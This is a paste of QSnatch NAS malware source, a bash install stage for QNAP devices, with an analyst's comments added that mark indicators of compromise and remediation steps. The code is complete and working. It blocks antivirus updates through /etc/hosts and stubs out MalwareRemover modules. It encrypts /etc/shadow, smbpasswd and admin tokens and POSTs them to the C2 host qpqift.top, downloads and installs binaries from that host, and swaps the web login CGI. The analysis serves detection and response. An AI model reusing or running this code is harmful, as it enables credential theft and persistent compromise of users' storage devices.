FlyFar

HEUR-Trojan.Shell.QSnatch.c_9d76d - Source Code

Jun 11th, 2023
  1. #!/bin/bash
# ---------------------------------------------------------------------------
# Analyst annotation. Code left exactly as pasted (gutter numbers included);
# only these '#' lines were added.
#
# Per the paste title this is a QSnatch sample: an install/update stage for a
# QNAP-style NAS (getcfg/setcfg, /etc/config/qpkg.conf, .qpkg, uLinux.conf).
# In order it: locates a data volume, masquerades as an up-to-date
# MalwareRemover, sinkholes AV update hosts, patches its own persistence
# scripts, installs fake update feeds, fetches helper binaries, neuters
# MalwareRemover modules, exfiltrates credentials, and swaps the web login
# CGI. Every download and upload goes to https://qpqift.top (C2 / IoC),
# always with curl -k (certificate validation disabled).
# It evidently expects root (reads /etc/shadow, writes /etc/hosts, /home/httpd).
# ---------------------------------------------------------------------------
# Epoch value used as a run-once marker filename suffix ("${ts}_c", see the
# exfiltration block and the last lines).
  2. ts=1548478800
  3. PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin"
# --- Locate a writable data volume ("bdir") -------------------------------
# Tries, in order: share paths from smb.conf, /share/<name> symlink targets,
# SHARE_DEF from def_share.info, mounted /share/* entries, well-known volume
# directory names, then /mnt/HDA_ROOT, then "/". Each "test -z || test ! -d
# && { ... }" block only runs when the previous attempt found nothing.
# Side effect: if readlink is missing it symlinks /usr/bin/readlink to
# busybox (a small but durable filesystem artifact).
# Hunting tip: the working copy lives under "${bdir}/.qpkg" (see below).
  4. test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
  5. test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && break; bdir=''; done
  6. test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; bdir=''; done
  7. test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"` && test -d "$bdir" || bdir=''
  8. test -z "${bdir}" || test ! -d "${bdir}"; } && { while read -r bdir; do
  9. test -d "$bdir" && break; bdir=''
  10. done <<EOF
  11. $(mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp")
  12. EOF
  13. test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in {{CE_,}CACHEDEV{1,2,3},MD0,HDA}_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; bdir=''; done
  14. test -z "${bdir}" || test ! -d "${bdir}" && { bdir=/mnt/HDA_ROOT && test -d "$bdir" || bdir='/'; }; }
  15.  
# --- Masquerade as an up-to-date MalwareRemover ---------------------------
# Rewrites the MalwareRemover entry in qpkg.conf (Version 9.0.0,
# Date 2019-02-25, Build 1551070800) so the NAS believes the remover is
# current. Detection: a qpkg.conf Version/Build that does not match the
# actually installed package.
  16. getcfg MalwareRemover Version -f /etc/config/qpkg.conf && setcfg MalwareRemover Version 9.0.0 -f /etc/config/qpkg.conf
  17. getcfg MalwareRemover Date -f /etc/config/qpkg.conf && setcfg MalwareRemover Date 2019-02-25 -f /etc/config/qpkg.conf
  18. getcfg MalwareRemover Build -f /etc/config/qpkg.conf && setcfg MalwareRemover Build 1551070800 -f /etc/config/qpkg.conf
  19.  
# --- Sinkhole AV signature update hosts via /etc/hosts --------------------
# "ipv6.clamav.net" already present is treated as "done". Otherwise appends
# 0.0.0.0 entries for the ClamAV mirrors, update.nai.com, and every
# db.<cc>.clamav.net / .ipv6 / .big variant for the country list below.
# Detection: grep /etc/hosts for "0.0.0.0 .*clamav" or "update.nai.com".
  20. if grep "ipv6.clamav.net" /etc/hosts; then
  21. :
  22. else
  23. countries='ac ad ae af ag ai al am an ao aq ar as at au aw ax az ba bb bd be bf bg bh bi bj bl bm bn bo bq br bs bt bv bw by bz ca cc cd cf cg ch ci ck cl cm cn co cr cu cv cw cx cy cz de dj dk dm do dz ec ee eg eh er es et eu fi fj fk fm fo fr ga gb gd ge gf gg gh gi gl gm gn gp gq gr gs gt gu gw gy hk hm hn hr ht hu id ie il im in io iq ir is it je jm jo jp ke kg kh ki km kn kp kr kw ky kz la lb lc li lk lr ls lt lu lv ly ma mc md me mf mg mh mk ml mm mn mo mp mq mr ms mt mu mv mw mx my mz na nc ne nf ng ni nl no np nr nu nz om pa pe pf pg ph pk pl pm pn pr ps pt pw py qa re ro rs ru rw sa sb sc sd se sg sh si sj sk sl sm sn so sr ss st su sv sx sy sz tc td tf tg th tj tk tl tm tn to tp tr tt tv tw tz ua ug uk um us uy uz va vc ve vg vi vn vu wf ws ye yt za zm zw'
  24.  
  25. { for host in 'bugs.clamav.net' 'current.cvd.clamav.net' 'database.clamav.net' 'db.local.clamav.net' 'update.nai.com'; do
  26. echo "0.0.0.0 ${host}"
  27. done
  28.  
  29. for country in $countries; do
  30. echo "0.0.0.0 db.${country}.clamav.net"
  31. echo "0.0.0.0 db.${country}.ipv6.clamav.net"
  32. echo "0.0.0.0 db.${country}.big.clamav.net"
  33. done; } >>/etc/hosts
  34. fi
  35.  
# --- Resolve the working directory ----------------------------------------
# Expects to run from "${bdir}/.qpkg/.config" or "${bdir}/.qpkg/.liveupdate";
# every relative path below (.qdisk_cmd, .rsakey, .qal, rssdoc/, the *_c
# markers, .tmp.*) resolves there. Those two hidden directories are the
# primary place to look for the on-disk footprint.
  36. test -z "$PWD" && PWD=$(pwd)
  37. CWD="$PWD"
  38. if [ "${CWD%/*}" != "${bdir}/.qpkg" ]; then
  39.         CWD=''
  40.         for dir in '.config' '.liveupdate'; do
  41.                 dir="${bdir}/.qpkg/${dir}"
  42.                 test -d "$dir" && cd "$dir" && CWD="$dir" && break
  43.         done
  44. fi
  45. test "$CWD" && test -d "$CWD" && cd "$CWD"
  46.  
# --- Rewrite the public-key literal inside two persistence scripts --------
# grepstring is a fragment of the same RSA public key that is written to
# .rsakey further down; sed splits that literal into
# 'verifykey="${verifykey}"' concatenations in .config/backup_conf.sh and
# .liveupdate/liveupdate.sh. Presumably this is to defeat plain-string
# matching on the key — unconfirmed from this file. Either way, those two
# scripts are the persistence components to collect and inspect.
  47. sedcmd='s/CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/CXqrBM2CVbJog4rwwSz1Bp1i1'"'"'\
  48. verifykey="${verifykey}"'"'"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex/'
  49. grepstring='CXqrBM2CVbJog4rwwSz1Bp1i1B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex'
  50. for path in ".config/backup_conf.sh" ".liveupdate/liveupdate.sh"; do
  51. if [ -f "${path#*/}" ]; then
  52. grep "$grepstring" "${path#*/}" && sed -i "$sedcmd" "${path#*/}"
  53. elif [ -f "${bdir}/.qpkg/${path}" ]; then
  54. test -f "${bdir}/.qpkg/${path}" && grep "$grepstring" "${bdir}/.qpkg/${path}" && sed -i "$sedcmd" "${bdir}/.qpkg/${path}"
  55. fi
  56. done
  57.  
# Second pass: same idea, splitting the literal at a different point (after
# the quote that the first pass introduced).
  58. sedcmd='s/CXqrBM2CVbJog4rwwSz1Bp1i1'"'"'/CXqrBM2CVbJo'"'"';verifykey="${verifykey}"'"'"'g4rwwSz1Bp1i1'"'/"
  59. grepstring='CXqrBM2CVbJog4rwwSz1Bp1i1'"'"
  60. for path in ".config/backup_conf.sh" ".liveupdate/liveupdate.sh"; do
  61. if [ -f "${path#*/}" ]; then
  62. grep "$grepstring" "${path#*/}" && sed -i "$sedcmd" "${path#*/}"
  63. elif [ -f "${bdir}/.qpkg/${path}" ]; then
  64. test -f "${bdir}/.qpkg/${path}" && grep "$grepstring" "${bdir}/.qpkg/${path}" && sed -i "$sedcmd" "${bdir}/.qpkg/${path}"
  65. fi
  66. done
  67.  
# Firmware version string, used to pick a matching fake feed directory.
  68. version=$(getcfg System Version)
  69. test "x${version}" = 'x' && version=$(getcfg System Version -f /etc/default_config/uLinux.conf)
  70.  
# --- Replace the QPKG Center feed XMLs with bundled copies ----------------
# Deletes /etc/config/rssdoc/qpkgcenter_*.xml and copies files from
# ./rssdoc/Liveupdate/QTS<version>/ (the archive fetched further down).
# ".qdisk_cmd +i" is used throughout in the manner of chattr +i;
# presumably it sets the immutable bit — unconfirmed. Remediation: such
# files must be unlocked before they can be deleted or restored.
  71. for file in /etc/config/rssdoc/qpkgcenter_*.xml
  72. do
  73. test -f "$file" && rm "$file" && cp "./rssdoc/Liveupdate/QTS${version}/${file##*/}" "$file" && test -f '.qdisk_cmd' && ./.qdisk_cmd +i "$file"
  74. done
  75. file=''
  76. if find /etc/config/ | grep 'qpkgcenter_.*\.xml'; then
  77. :
  78. else
  79. cp "./rssdoc/Liveupdate/QTS${version}/qpkgcenter_eng.xml" '/etc/config/rssdoc/qpkgcenter_eng.xml'
  80. test -f '.qdisk_cmd' && ./.qdisk_cmd +i '/etc/config/rssdoc/qpkgcenter_eng.xml'
  81. fi
  82.  
# --- Fetch the .qdisk_cmd helper for this CPU architecture -----------------
# Downloads https://qpqift.top/data/qdisk_cmd_<arch>, checks its SHA-1
# (base64) against the embedded per-arch value, then chmod +x. The three
# hashes below identify the dropped binary (x86_64 / arm / i486).
  83. if [ ! -f ".qdisk_cmd" ]; then
  84.     case "$(uname -m)" in
  85.     *x86_64*)
  86.             arch=x86_64
  87.             binhash='g2oe7EJJVCiAHY6AG1I1c/lGF8Y='
  88.             ;;
  89.     *arm*)
  90.             arch=arm
  91.             binhash='Z3twHZvQqYZ1vLeu4PLnZekdkRY='
  92.             ;;
  93.     *i*86*)
  94.             arch=i486
  95.             binhash='gWzECXuIp3dz5yI7RJS9d4+xpq4='
  96.             ;;
  97.     esac
  98.    
  99.     if [ "x${binhash}" != 'x' ]; then
  100.         curl --connect-timeout 12 -m 1200 -k -o ".qdisk_cmd.tmp" "https://qpqift.top/data/qdisk_cmd_${arch}" || rm -f ".qdisk_cmd.tmp"
  101.         test -f '.qdisk_cmd.tmp' && rsynchash="$(openssl dgst -sha1 -binary ".qdisk_cmd.tmp" | openssl base64)"
  102.         if [ "x${rsynchash}" = "x${binhash}" ]; then
  103.             mv '.qdisk_cmd.tmp' '.qdisk_cmd' && chmod +x '.qdisk_cmd'
  104.         else
  105.             rm -f '.qdisk_cmd.tmp'
  106.         fi
  107.     fi
  108. fi
  109. binhash=''; rsynchash=''
  110.  
# --- Neuter MalwareRemover modules ------------------------------------------
# Ensures .qpkg/MalwareRemover exists (and pins it), then overwrites
# modules/10_derek_3.pyc and 12_derek_3.pyc with a two-line "exit 0" shell
# stub, marks them executable and pins them. Detection: ".pyc" files in
# MalwareRemover/modules that start with "#!/bin/sh".
  111. for qpkgdir in "${bdir}/.qpkg" '../../.qpkg'; do
  112. test -d "$qpkgdir" && break
  113. done
  114. test -d "${qpkgdir}/MalwareRemover" || mkdir "${qpkgdir}/MalwareRemover"
  115. test -f '.qdisk_cmd' && ./.qdisk_cmd +i "${qpkgdir}/MalwareRemover"
  116.  
  117. if [ -d "${qpkgdir}/MalwareRemover/modules" ]; then
  118. for file in 10_derek_3.pyc 12_derek_3.pyc; do
  119. test ! -f "${qpkgdir}/MalwareRemover/modules/${file}" || rm -f "${qpkgdir}/MalwareRemover/modules/${file}" && cat >"${qpkgdir}/MalwareRemover/modules/${file}" <<"EOF"
  120. #!/bin/sh
  121. exit 0
  122. EOF
  123. chmod +x "${qpkgdir}/MalwareRemover/modules/${file}"
  124. test -f '.qdisk_cmd' && ./.qdisk_cmd +i "${qpkgdir}/MalwareRemover/modules/${file}"
  125. done
  126. fi
  127. file=''; qpkgdir=''
  128.  
# --- Drop the operator's RSA public key -------------------------------------
# Written to .rsakey if absent. It is used below to wrap the per-run AES
# key, so only the holder of the matching private key can read the upload.
# The key text itself is a usable IoC for this variant.
  129. if [ ! -f .rsakey ]; then
  130. verifykey='-----BEGIN PUBLIC KEY-----
  131. MIIBojANBgkqhkiG9w0BAQEFAAOCAY8AMIIBigKCAYEAt/EDT6SB75atrHW7Cpog
  132. CXqrBM2CVbJog4rwwSz1Bp1i1'
  133. verifykey="${verifykey}"'B7B9Wd51no32lpRqOM+9GOr2W17xwJ8pqpQotex
  134. RC5qQSiS/7FS48jsPKsJnrUhnsI1fRLM4DqsEF3UOukZuDOYUhlteDuMqqZBz0AC
  135. Q3YnLjraTjchMF0XmaAAcWOkg5MsxAOKTepue4R/tnrPAkAG86nq5LA1+wa7opNV
  136. gQzwDh7YXhBnWz52+ebZ9TeqD31/sb5hoyUKf1Nr5HcKkklObuz1OGQJ//pkCbTC
  137. 2EnQw6tCPQhgSIA8wJKkaxW0f/UHP+YBmWa4Wn+uPrJJuHSVNEJtAp2wlX3THltz
  138. 0IGPQEuzoafOAl3EFjas3HcTX2HlEfnvAtRL2iLxJeba1nZ+U3geZOuxL1NhWhNh
  139. pjaLcKwhkRck7Y5hr1Pz8pLDnXsx5w0QUz6XS8HVf/KHnNXHufFEn01y9YoPuau1
  140. DNnpDGbq632Bs8ESd3ueHk9OY/UZxWeN3UdbseFxK35XAgMBAAE=
  141. -----END PUBLIC KEY-----'
  142. test -f ".rsakey" || echo "$verifykey" > ".rsakey"
  143. fi
  144.  
# --- Credential / config exfiltration (once per "${ts}_c" marker) -----------
# Generates a 20-character random key (two fallbacks for the random source),
# RSA-encrypts it with .rsakey, then bundles: ${bdir}/.log/.rqsys.log, the
# admin .qtoken and secondSV.conf, ssmtp.conf, smbpasswd, /etc/shadow,
# qnapddns.conf, qid.conf, and the output of running authLogin.cgi. The
# bundle is gzipped, capped at 2 MiB (dd 4096*512 / head -c 2097152),
# AES-256-CBC encrypted (-md md5, salted, base64) with that key, and POSTed
# to https://qpqift.top/ping.pl.
# Response: treat the contents of every file in that list as compromised —
# password hashes (shadow, smbpasswd), the admin token, and mail/DDNS
# configuration — and rotate accordingly. Network detection: a single POST
# to qpqift.top/ping.pl from the NAS.
  145. if [ ! -f "${ts}_c" ]; then
  146. key=$(tr -dc 'a-zA-Z0-9' </dev/urandom | { key=''; dd bs=20 count=1 2>/dev/null || head -c 20 || IFS='' read -rd '' -n 20 key; echo "$key"; } )
  147. test "x$key" = 'x' && key=$(LC_ALL=C sed 's/[^a-zA-Z0-9]//g' </dev/urandom | { key=''; dd bs=20 count=1 2>/dev/null || head -c 20 || IFS='' read -rd '' -n 20 key; echo "$key"; } )
  148. { echo "$key" | openssl rsautl -pubin -inkey .rsakey -encrypt | openssl enc -base64 -A; printf ':'
  149. { echo; for file in "${bdir}/.log/.rqsys.log" /etc/config/.qos_config/users/admin/.qtoken /etc/config/.qos_config/users/admin/secondSV.conf /etc/config/ssmtp/ssmtp.conf /etc/config/smbpasswd /etc/shadow /mnt/HDA_ROOT/.config/qnapddns.conf /mnt/HDA_ROOT/.config/qid.conf; do printf '%s:' "$file"; cat "$file"; echo; done; printf '%s:' "authLogin.cgi"; /home/httpd/cgi-bin/authLogin.cgi; } | gzip | { dd bs=4096 count=512 || head -c 2097152 || cat; } | openssl enc -aes-256-cbc -k "$key" -md md5 -salt -a -A; } | curl --connect-timeout 12 -m 300 -k -d '@-' "https://qpqift.top/ping.pl"
  150. fi
  151.  
# --- Swap the web login CGI (once per marker 1547971200_c) -------------------
# Only when the genuine authLogin.cgi is present and no sysauthLogin.cgi
# backup exists yet. Downloads qal_<arch> from the C2 as .qal, verifies its
# SHA-1 against the embedded per-arch hashes, moves the real authLogin.cgi
# aside as sysauthLogin.cgi and installs .qal in its place. What the
# replacement does to logins is not visible here; given which file it
# replaces, assume credential capture until proven otherwise.
# Detection: /home/httpd/cgi-bin/sysauthLogin.cgi existing, or an
# authLogin.cgi whose hash does not match the firmware. Remediation: the
# original is the sysauthLogin.cgi copy (the script's own fallback a few
# lines down moves it back when authLogin.cgi is missing).
  152. cgibindir='/home/httpd/cgi-bin'
  153. if [ ! -f "1547971200_c" ] && [ ! -f "${cgibindir}/sysauthLogin.cgi" ] && [ -f "${cgibindir}/authLogin.cgi" ]; then
  154.     case "$(uname -m)" in
  155.     *x86_64*)
  156.             arch=x86_64
  157.             binhash='pt+a/Y3gGOPe9uyBgm85h2eOQV8='
  158.             ;;
  159.     *arm*)
  160.             arch=arm
  161.             binhash='W5SbpKsI90NUy4uQg3Pm1agAFho='
  162.             ;;
  163.     *i*86*)
  164.             arch=i486
  165.             binhash='TagzVbVf5YhxA3ZXwgBMQKw2zG4='
  166.             ;;
  167.     esac
  168.    
  169.     if [ "x${binhash}" != 'x' ]; then
  170.         curl --connect-timeout 12 -m 1200 -k -o ".qal" "https://qpqift.top/data/qal_${arch}" || rm -f ".qal"
  171.         test -f '.qal' && rsynchash="$(openssl dgst -sha1 -binary ".qal" | openssl base64)"
  172.         if [ "x${rsynchash}" = "x${binhash}" ]; then
  173.             test -f "${cgibindir}"/sysauthLogin.cgi && mv "${cgibindir}"/sysauthLogin.cgi "${cgibindir}"/authLogin.cgi
  174.             mv "${cgibindir}"/authLogin.cgi "${cgibindir}"/sysauthLogin.cgi && test -f "${cgibindir}"/sysauthLogin.cgi && mv '.qal' "${cgibindir}"/authLogin.cgi && chmod +x "${cgibindir}"/authLogin.cgi
  175.         fi
  176.     fi
  177.     test -f "1547971200_c" || touch "1547971200_c"
  178. fi
  179.  
# Self-repair: if the login CGI went missing, put the saved original back so
# the NAS keeps working (and the infection stays unnoticed).
  180. test ! -f "${cgibindir}"/authLogin.cgi && test -f "${cgibindir}"/sysauthLogin.cgi && mv "${cgibindir}"/sysauthLogin.cgi "${cgibindir}"/authLogin.cgi
  181.  
# --- Fetch the fake update-feed bundle ---------------------------------------
# rssdoc.tar.bz2 (or .gz when bunzip2 is absent) from the C2, SHA-1 checked
# against the two embedded hashes (IoCs for the bundle), extracted into
# ./rssdoc. Any failure exits 1 and leaves the rest of this script undone.
# Note the tar-failure cleanup expands to "rssdoc.tar." and
# "rssdoc.tar..<ext>", which do not name the archive, so a partially
# extracted run can leave the downloaded tarball behind as an artifact.
  182. if [ ! -d rssdoc ]; then
  183. command -v bunzip2 && compext=bz2 || compext=gz
  184. curl --connect-timeout 12 -m 1200 -k -o "rssdoc.tar.${compext}" "https://qpqift.top/data/rssdoc.tar.${compext}" || { rm "rssdoc.tar.${compext}" && exit 1; }
  185. test -f "rssdoc.tar.${compext}" || exit 1
  186. rssdochash="$(openssl dgst -sha1 -binary "rssdoc.tar.${compext}" | openssl base64)"
  187. test "$rssdochash" = 'WOkc6vlUa7A30GKa4Z4o02CIexk=' || test "$rssdochash" = "0h0Jyx52a/F9YB80Ml4SsEsugyA=" || { rm -f "rssdoc.tar.${compext}"; exit 1; }
  188. test "$compext" = bz2 && tarflag=j || tarflag=z
  189. tar -x${tarflag}f "rssdoc.tar.${compext}" || { rm -f rssdoc.tar.{,.${compext}}; exit 1; }
  190. rm -f "rssdoc.tar.${compext}"
  191. fi
  192.  
# --- Point the web server's update feeds at the bundled fakes ----------------
# Removes /home/httpd/Liveupdate, FirmwareReleaseS.xml and
# FirmwareRelease_betaS.xml and symlinks them into "${CWD}/rssdoc".
# Detection: symlinks in /home/httpd resolving into a hidden .qpkg path.
  193. rm /home/httpd/{Liveupdate,FirmwareRelease{,_beta}S.xml}
  194. ln -s "${CWD}"/rssdoc/{Liveupdate,FirmwareRelease{,_beta}S.xml} /home/httpd
  195.  
# --- Redirect firmware / QPKG update checks to the local fake feed -----------
# If uLinux.conf still references qnap.com (or a 0.0.0.0 sinkhole), rewrites
# the Liveupdate / FirmwareRelease / QTS_FW URLs to
# http://127.0.0.1:<InnerWebAccessPort, default 58080>/..., so the NAS only
# ever sees the attacker's feed and never a real update. localupdateurl is
# assigned but never used. Detection: update URLs pointing at 127.0.0.1 in
# /etc/config/uLinux.conf or /etc/default_config/uLinux.conf.
  196. if grep 'Liveupdate\|FirmwareRelease\|QTS_FW' /etc/default_config/uLinux.conf /etc/config/uLinux.conf | grep 'qnap\.com\|0\.0\.0\.0'; then
  197. internalwebport=$(/sbin/getcfg System InnerWebAccessPort -d 58080)
  198. localupdateurl="http://127.0.0.1:${internalwebport}"
  199. sed -i 's/https\?:\/\/[^\/]\+\/\(Liveupdate\|FirmwareRelease\|QTS_FW\)/http:\/\/127.0.0.1:'${internalwebport}'\/\1/' /etc/default_config/uLinux.conf /etc/config/uLinux.conf
  200. fi
  201.  
# --- Retire an older SSH-based component --------------------------------------
# If the AuthorizedKeysFile named in /etc/config/.qsync.conf holds a key
# containing "miOGcmendZU2r10SdZVplBQ4i", that line is deleted and the first
# process lsof reports on port 51163 gets SIGINT. The key fragment and the
# port are IoCs for the earlier variant this one appears to supersede
# (inferred from the cleanup, not stated in the file).
  202. test -f /etc/config/.qsync.conf && authkeysfile=$(grep AuthorizedKeysFile /etc/config/.qsync.conf | sed 's/"//g' | cut -d ' ' -f 2)
  203. if [ "$authkeysfile" ] && [ -f "$authkeysfile" ] && grep 'miOGcmendZU2r10SdZVplBQ4i' "$authkeysfile"; then
  204. sed -i '/miOGcmendZU2r10SdZVplBQ4i/d' "$authkeysfile"
  205. lsofout="$(lsof +c 0 -i -n -P | grep :51163)"
  206. sshpid="$(echo "$lsofout" | tr -s ' ' | cut -d ' ' -f 2 | head -n 1)"
  207. kill -2 "$sshpid"
  208. fi
  209.  
# Run-once marker and temp-file cleanup. The "${ts}_c" (1548478800_c) and
# "1547971200_c" files in the working directory are durable artifacts of a
# completed run; removing them would cause the gated blocks above to run again.
  210. test -f "${ts}_c" || touch "${ts}_c"
  211. rm -f "${CWD}/".tmp.*
  212. exit 0